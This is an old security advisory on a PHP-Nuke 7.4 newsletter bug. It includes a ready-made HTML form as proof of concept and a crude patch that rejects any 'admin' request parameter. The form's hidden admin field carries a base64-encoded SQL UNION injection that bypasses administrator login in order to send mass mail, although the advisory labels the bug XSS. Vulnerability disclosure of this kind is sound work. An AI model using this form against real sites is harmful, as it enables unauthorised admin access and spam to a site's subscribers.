************************************************************** * CODEBUG Labs * Advisory #5 * Title: Newsletter Injection Bug * Author: Pierquinto 'Mantra' Manco * Product: PHP-Nuke 7.4 * Type: XSS * Web: http://www.mantralab.org * ************************************************************** Newsletter Injection Bug - ) Description PHP-Nuke is a very bugged web CMS, version 7.4 has critical XSS bug that permit to an attacker to post message in system newsletter. We can bypass the official php-nuke patch sending data by POST instead of GET. - ) Proof-of-Concept Create a HTML file with this lines: <form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php";> <p>TITLE: <input type="text" name="title"> <br> CONTENT: <textarea name="content" rows=10 cols=50></textarea> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="massmail_send"> </p> <p> <input type="submit" name="Submit" value="Send to target site newsletter"> <br> </p> </form> - ) Patch Apply this code to your admin.php file: if ( !empty($HTTP_GET_VARS['admin']) ) { die("Shit! Mantra wins =)"); } if ( !empty($HTTP_POST_VARS['admin']) ) { die("Shit! Mantra wins =)"); } -) Note Previous patch isn't enough performant. Try this one. There are a lot of this problem in PHP-Nuke 7.4, my patch will check the content of $_POST[admin] and $_GET[admin]. I'm going to post all this vulnerabilities on my site... http://www.mantralab.org ************************************************************** http://www.mantralab.org **************************************************************
